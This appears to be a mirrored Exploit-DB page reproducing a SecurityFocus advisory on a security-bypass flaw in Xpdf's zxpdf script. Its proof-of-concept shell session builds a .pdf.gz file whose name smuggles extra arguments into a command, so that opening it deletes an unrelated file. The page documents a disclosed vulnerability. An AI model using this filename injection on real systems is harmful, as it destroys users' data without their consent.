Xpdf 3.02-13 – ‘zxpdf’ Security Bypass

• Exploit Database
• 120 阅读

• 作者： Chung-chieh Shan
  日期： 2011-08-04
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/36016/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

  source: https://www.securityfocus.com/bid/49007/info   Xpdf is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.   Attackers can exploit this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.   $ touch y # The unrelated victim file $ gzip -c </dev/null >&apos;" y ".pdf.gz&apos; # Create a .pdf.gz file $ xpdf &apos;" y ".pdf.gz&apos; # View it using xpdf Error: May not be a PDF file (continuing anyway) Error: PDF file is damaged - attempting to reconstruct xref table... Error: Couldn&apos;t find trailer dictionary Error: Couldn&apos;t read xref table rm: cannot remove `/tmp/&apos;: Is a directory $ ls -l y # The victim file is gone! ls: cannot access y: No such file or directory